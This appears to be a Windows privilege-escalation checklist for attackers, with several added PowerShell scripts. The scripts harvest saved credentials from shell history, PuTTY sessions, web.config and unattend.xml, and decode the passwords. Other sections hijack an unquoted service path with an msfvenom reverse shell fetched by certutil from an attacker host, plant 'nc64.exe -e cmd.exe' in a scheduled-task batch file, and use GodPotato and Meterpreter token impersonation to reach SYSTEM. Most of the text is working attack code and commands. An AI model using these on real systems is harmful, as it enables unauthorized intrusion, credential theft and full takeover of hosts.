Windows Privesc Checklist


doskey /history
Show the command history of the current cmd.exe session (it is not persisted to disk).

powershell -c "Get-Service"
Return services.

Get-ScheduledTask
Return Scheduled tasks.

cmdkey /list
List credentials saved in Credential Manager (the password itself is not shown).

runas /savecred /user:admin powershell.exe
Run a program with a saved credential. admin is a placeholder: use an account that appears in the cmdkey /list output, otherwise runas just prompts for a password.

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Show PowerShell (PSReadLine) history from a cmd.exe prompt. cmd.exe keeps no history file of its own; doskey /history is all there is for the running session.

type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Show the same PowerShell history from a PowerShell prompt. Other profiles under C:\Users are worth checking too when they are readable.

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr /i connectionString
Search the .NET framework root web.config for database connection strings. Site and application configs live under the web root, usually C:\inetpub\wwwroot\web.config, and are the more likely place to find a password.

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Look for PuTTY proxy credentials (ProxyUsername / ProxyPassword) in the registry (SimonTatham is PuTTY's author). HKEY_CURRENT_USER only covers the current user's saved sessions.
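The checks above can be run across the whole box instead of only the current user. The script below is an added example, not part of the original page: it sweeps every profile for PSReadLine history, every loaded user hive for PuTTY session credentials, and the IIS web root plus the framework config directories for connection strings. Reading other profiles or other users' hives normally needs admin rights, so an empty result for those from a low-privilege shell is expected; the only assumed paths are the standard C:\Users and C:\inetpub locations.

```powershell
# Added example (not from the original page): sweep the credential locations listed
# above for every profile/hive on the host, not just the current user.

function Find-ShellHistory {
    # PSReadLine history for every profile under C:\Users (this is PowerShell history;
    # cmd.exe history lives only in the running session, see doskey /history)
    Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue | ForEach-Object {
        $hist = Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
        if (Test-Path -LiteralPath $hist) {
            # keep only lines that look credential-related
            Select-String -LiteralPath $hist -Pattern 'pass|pwd|secret|cred|runas|net use|token|ConvertTo-SecureString' |
                ForEach-Object {
                    [pscustomobject]@{ Profile = $_.Path.Split('\')[2]; Line = $_.LineNumber; Text = $_.Line.Trim() }
                }
        }
    }
}

function Find-PuttySessionCreds {
    # PuTTY keeps saved sessions per user under HKCU\Software\SimonTatham\PuTTY\Sessions;
    # walking HKEY_USERS covers every hive that is currently loaded, not only ours
    $keys = Get-ChildItem 'Registry::HKEY_USERS\*\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue
    foreach ($key in $keys) {
        $s = Get-ItemProperty -LiteralPath $key.PSPath
        [pscustomobject]@{
            Hive      = ($key.Name -split '\\')[1]                    # SID of the user the session belongs to
            Session   = [uri]::UnescapeDataString($key.PSChildName)  # PuTTY URL-encodes session names
            Host      = $s.HostName
            User      = $s.UserName
            ProxyHost = $s.ProxyHost
            ProxyUser = $s.ProxyUsername
            ProxyPass = $s.ProxyPassword
        }
    }
}

function Find-ConnectionStrings {
    # IIS site/application web.config files plus the .NET framework root config directories
    $roots = @('C:\inetpub',
               'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config',
               'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config')
    Get-ChildItem -Path $roots -Recurse -Include 'web.config', 'machine.config' -ErrorAction SilentlyContinue |
        Select-String -Pattern 'connectionString|password=|pwd=' |
        ForEach-Object { [pscustomobject]@{ File = $_.Path; Line = $_.LineNumber; Text = $_.Line.Trim() } }
}

Find-ShellHistory      | Format-Table -AutoSize
Find-PuttySessionCreds | Format-Table -AutoSize
Find-ConnectionStrings | Format-Table -AutoSize -Wrap
```

A PuTTY session whose ProxyPass column is filled is the same finding the reg query above produces, with the owning user's SID attached, which matters when the credential belongs to an administrator rather than to you.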

Other Suggestions


Windows Automated Scripts


POWERUP

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

. .\PowerUp.ps1
Invoke-AllChecks


PRIVESCHECK

https://github.com/itm4n/PrivescCheck

Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1
Invoke-PrivescCheck


EXPLOIT-SUGGESTER

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

On target

systeminfo > systeminfo.txt
Save the output and copy the file to the attacker machine.

On attacker machine

pip install xlrd==1.2.0
An old xlrd is needed to read the .xls bulletin database.

windows-exploit-suggester.py --update
windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DATE]-mssb.xls
--update downloads the Microsoft Security Bulletin spreadsheet (file name prefixed with the download date). That data source was discontinued in 2017, so for hosts patched after that the results are incomplete and a tool with a current data source (e.g. WES-NG) is needed.


WINPEAS

https://github.com/carlospolop/PEASS-ng/releases

winPEASx64.exe
Run winPEAS (use winPEASx86.exe on 32-bit targets).

WINPEAS Output

WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected YOU CAN MODIFY THIS SERVICE: AllAccess

The binary path is unquoted and contains spaces, so when the service starts Windows tries C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Wise\Wise.exe and C:\Program Files (x86)\Wise\Wise Care.exe, in that order, before the real BootTime.exe. Dropping a Wise.exe into C:\Program Files (x86)\Wise therefore hijacks the service, provided that directory is writable (check with icacls "C:\Program Files (x86)\Wise") and the service runs as a privileged account. "YOU CAN MODIFY THIS SERVICE: AllAccess" is a separate finding: the service ACL lets the current user stop and start it, which is what makes the restart below possible (with AllAccess, sc config WiseBootAssistant binPath= "..." would also work, no unquoted path needed).

On attacker machine

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o Wise.exe
Create a reverse shell named after the first hijackable path segment (Wise.exe). A plain exe started as a service is killed by the Service Control Manager after about 30 seconds because it never reports its status, so either migrate or spawn another process as soon as the shell arrives, or build the payload with -f exe-service instead.

nc -lvnp [ATTACKER_PORT]
Open a listener, and serve Wise.exe over HTTP on a different port (e.g. python3 -m http.server [HTTP_PORT]).

On target machine

cd "C:\Program Files (x86)\Wise"
certutil.exe -urlcache -f http://[ATTACKER_IP]:[HTTP_PORT]/Wise.exe Wise.exe
Download the crafted executable into the directory that sits before the first exploitable space in the vulnerable path. [HTTP_PORT] is the web server port, not the netcat listener port.

sc.exe stop WiseBootAssistant
sc.exe query WiseBootAssistant
sc.exe start WiseBootAssistant
Restart the service so the SCM resolves the path again and runs Wise.exe. If the account cannot stop the service but can reboot (SeShutdownPrivilege), shutdown /r /t 0 achieves the same for an Auto-start service.
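The winPEAS line above is one instance of a general check. The script below is an added example, not from the original page or from winPEAS: it lists every service whose binary path is unquoted and contains a space, reproduces the search order CreateProcess uses (cut the path at each space, append .exe), and probes each of those directories for write access by creating and deleting a random file. Service names and paths are whatever the host has; nothing else is assumed.

```powershell
# Added example (not from the original page or from winPEAS): enumerate unquoted service
# paths and the hijack locations they expose, with a real write probe per directory.

function Get-HijackCandidates {
    # the search order CreateProcess uses for an unquoted path: cut at each space, append .exe
    param([string]$ImagePath)
    $m   = [regex]::Match($ImagePath, '^.*?\.exe', 'IgnoreCase')   # drop trailing arguments
    $exe = if ($m.Success) { $m.Value } else { $ImagePath.Trim() }
    $parts = $exe -split ' '
    for ($i = 0; $i -lt $parts.Count - 1; $i++) {
        ($parts[0..$i] -join ' ') + '.exe'        # everything before the (i+1)th space
    }
}

function Test-DirectoryWritable {
    # Probe instead of reading the ACL: creating a file is what the hijack needs anyway
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')   # throws UnauthorizedAccessException when we cannot write
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Find-UnquotedServicePaths {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc  = $_
        if (-not $svc.PathName) { return }
        $path = $svc.PathName.Trim()
        if ($path.StartsWith('"')) { return }       # quoted: not exploitable this way
        foreach ($candidate in Get-HijackCandidates $path) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                State     = $svc.State
                HijackAs  = $candidate
                Writable  = Test-DirectoryWritable (Split-Path -Path $candidate -Parent)
            }
        }
    }
}

# Only rows with a writable directory matter; HijackAs is the file name to drop there
Find-UnquotedServicePaths | Where-Object Writable | Format-Table -AutoSize
```

A writable directory is only half of the finding: the service also has to run as a privileged account (RunsAs) and you need a way to restart it, either through the service ACL, as winPEAS reported for WiseBootAssistant, or through a reboot.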


ROADRECON (Azure AD)

https://github.com/dirkjanm/ROADtools/wiki/Getting-started-with-ROADrecon
Azure AD enumeration run from the attacker machine, not a local Windows check.

Windows Privesc Potato


Elevate a service account (IIS application pool, MSSQL, etc.) that holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to NT AUTHORITY\SYSTEM. Check whoami /priv first: without one of those two privileges the Potato family does not apply.

Affected versions:

  • Windows Server 2012 to Windows Server 2022
  • Windows 8 to Windows 11

GodPotato

https://github.com/BeichenDream/GodPotato/releases

GodPotato -cmd "cmd /c whoami"
Privesc and run whoami as NT AUTHORITY\SYSTEM. Release binaries are built per .NET Framework version (GodPotato-NET4.exe fits most current hosts); pick the one matching the target.

Windows Privesc Abusing Schtasks


Show Schtasks

schtasks /query /tn vulnerableTask /fo list /v
Show detailed information about the scheduled task (run-as user, command, next run time). vulnerableTask is a placeholder name.

cd "c:\Program Files (x86)\SystemScheduler\Events"
type [ID].INI_LOG.txt
Show the task logs. This path belongs to the third-party System Scheduler application, not to the Windows Task Scheduler; the log shows which user each task ran as.


Replace executable

mv executedByTask.exe executedByTask.exe.bak
mv msfvenomReverseShell.exe executedByTask.exe
Replace the exe executed by the scheduled task (mv is the PowerShell alias of Move-Item; in cmd use move). Requires write access to the file or its directory.


Inject scheduled task

echo c:\tools\nc64.exe -e cmd.exe [ATTACKER_IP] [ATTACKER_PORT] > C:\tasks\schtask.bat
Overwrite the batch file the scheduled task runs with a reverse shell (paths are examples). The shell arrives at the next trigger, as the task's run-as user.
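Both tricks above depend on finding a task that runs as someone else and executes something you can overwrite. The script below is an added example, not from the original page: it walks the Windows Task Scheduler (the built-in ScheduledTasks module, not the third-party System Scheduler mentioned above), resolves the program each task executes and any script passed to it as an argument, and reports whether one of the current user's SIDs holds an Allow ACE with a write-class right on that file or its directory. Deny ACEs are ignored, so treat a hit as a candidate and confirm it by actually writing. Task names and paths are whatever the host has.

```powershell
# Added example (not from the original page): find scheduled tasks whose executable or
# script the current user can overwrite (the "replace" and "inject" cases above).

function Test-WriteAccess {
    # Approximate: any Allow ACE for one of our SIDs granting a write-class right.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # rights that let us replace the file, or change its ACL/owner and then replace it
    $write = [int][Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $write = $write -bor 0x40000000 -bor 0x10000000     # GENERIC_WRITE, GENERIC_ALL as they appear in raw ACEs
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if (($sids -contains $sid) -and (([int]$ace.FileSystemRights -band $write) -ne 0)) { return $true }
    }
    return $false
}

function Get-TaskTargets {
    $mePattern = '(^|\\)' + [regex]::Escape($env:USERNAME) + '$'
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $task  = $_
        $runAs = $task.Principal.UserId
        # only tasks that run as someone other than us are worth hijacking
        if (-not $runAs -or $runAs -match $mePattern) { return }
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }      # ComHandler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            # a script handed to cmd/powershell/wscript as an argument is the "inject" case
            $script = $null
            if ($action.Arguments -match '([A-Za-z]:\\[^"\s]+\.(bat|cmd|ps1|vbs|js))') { $script = $Matches[1] }
            $exeExists = Test-Path -LiteralPath $exe
            [pscustomobject]@{
                Task           = $task.TaskPath + $task.TaskName
                RunsAs         = $runAs
                State          = $task.State
                Exe            = $exe
                ExeWritable    = [bool]($exeExists -and (Test-WriteAccess $exe))
                DirWritable    = [bool]($exeExists -and (Test-WriteAccess (Split-Path -Path $exe -Parent)))
                Script         = $script
                ScriptWritable = [bool]($script -and (Test-Path -LiteralPath $script) -and (Test-WriteAccess $script))
            }
        }
    }
}

Get-TaskTargets |
    Where-Object { $_.ExeWritable -or $_.DirWritable -or $_.ScriptWritable } |
    Format-List
```

DirWritable without ExeWritable still works for the "replace" case when you can rename the original (Delete on the file is granted through the directory), which is exactly what the mv-to-.bak step above relies on.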

Windows Privesc Abusing SE Privileges


Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

whoami /priv
Show the current user's privileges. A privilege listed as Disabled is still held by the token and can be enabled by the process, so both states count.


SeDebugPrivilege and SeImpersonatePrivilege

If the current user has SeImpersonatePrivilege (and SeDebugPrivilege, to reach tokens held by other users' processes), a Meterpreter session can impersonate another user's token with the incognito extension.

load incognito
Load the incognito module.

list_tokens -u
List the available delegation and impersonation tokens by user (-g lists them by group).

impersonate_token "BUILTIN\\Administrators"
Impersonate the token. The backslash has to be doubled in the Meterpreter console.

The impersonation token only applies to the current thread; anything spawned from it, and Windows itself when it checks rights, uses the process's primary token. So migrate into a process that already runs with the wanted token.

The safest pick is services.exe (find its PID with ps).

migrate 668
Migrate to process 668 (the services.exe PID on the target).

rev2self
Revert to the original user.

Windows Privesc Unattended Path

Unattended Setup is the method OEMs and administrators use to install Windows without interaction, and the answer file it leaves behind can contain account passwords. Common locations are C:\Windows\Panther\Unattend.xml, C:\Windows\Panther\Unattend\Unattend.xml (also seen as Unattended.xml) and C:\Windows\System32\Sysprep\Unattend.xml. The password is base64 encoded when <PlainText>false</PlainText>; in files written by sysprep the encoded value is the UTF-16LE password with the literal string "Password" appended, so strip that suffix after decoding.

type C:\Windows\Panther\Unattend\Unattended.xml
Display the unattended answer file; the AutoLogon block below is the part to look for.

<AutoLogon>
    <Password>
        <Value>dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Administrator</Username>
</AutoLogon>
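The script below is an added example, not from the original page: it checks the usual answer-file locations, pulls every AutoLogon, LocalAccount and AdministratorPassword entry with an XPath that ignores the unattend namespace, and decodes the value. It tries the sysprep form first (UTF-16LE with a trailing "Password") and falls back to plain base64 text, which is the form of the sample above. The file paths are the standard ones and the two sample values at the end are constructed for the demonstration; nothing else is assumed.

```powershell
# Added example (not from the original page): locate unattended answer files and decode
# the passwords in them, handling both the sysprep encoding and plain base64.

function ConvertFrom-UnattendPassword {
    param([Parameter(Mandatory)][string]$Value, [string]$PlainText = 'false')
    if ($PlainText -eq 'true') { return $Value }
    $bytes = [Convert]::FromBase64String($Value)
    if ($bytes.Length % 2 -eq 0) {
        # sysprep form: UTF-16LE(password + "Password")
        $u16 = [Text.Encoding]::Unicode.GetString($bytes)
        if ($u16.EndsWith('Password')) { return $u16.Substring(0, $u16.Length - 8) }
    }
    # fallback: base64 of the raw password, as in the sample above
    return [Text.Encoding]::UTF8.GetString($bytes)
}

function Find-UnattendPasswords {
    $candidates = @(
        'C:\Windows\Panther\Unattend.xml',
        'C:\Windows\Panther\Unattended.xml',
        'C:\Windows\Panther\Unattend\Unattend.xml',
        'C:\Windows\Panther\Unattend\Unattended.xml',
        'C:\Windows\System32\Sysprep\Unattend.xml',
        'C:\Windows\System32\Sysprep\Panther\Unattend.xml',
        'C:\Unattend.xml'
    )
    foreach ($file in $candidates) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        [xml]$doc = Get-Content -LiteralPath $file -Raw
        # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace
        foreach ($pw in $doc.SelectNodes('//*[local-name()="Password" or local-name()="AdministratorPassword"]')) {
            $value = $pw.SelectSingleNode('*[local-name()="Value"]')
            if (-not $value) { continue }
            $plain = $pw.SelectSingleNode('*[local-name()="PlainText"]')
            $plainText = if ($plain) { $plain.InnerText } else { 'false' }
            # AutoLogon carries <Username>, LocalAccount carries <Name>, AdministratorPassword is implicit
            $owner = $pw.ParentNode.SelectSingleNode('*[local-name()="Username" or local-name()="Name"]')
            $user  = if ($pw.LocalName -eq 'AdministratorPassword') { 'Administrator' }
                     elseif ($owner) { $owner.InnerText } else { '?' }
            [pscustomobject]@{
                File     = $file
                Element  = $pw.ParentNode.LocalName
                User     = $user
                Password = ConvertFrom-UnattendPassword -Value $value.InnerText -PlainText $plainText
            }
        }
    }
}

# Constructed samples: the value shown on the page (plain base64) and a sysprep-style value
$pagePassword    = ConvertFrom-UnattendPassword 'dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ='
$sysprepPassword = ConvertFrom-UnattendPassword ([Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('S3cret!Password')))

Find-UnattendPasswords | Format-List
```

Decoding with the UTF-16 branch first is safe for the plain form too: a raw ASCII password of even length decodes to nonsense that does not end in "Password", so the function falls through to the plain decode rather than returning the garbage.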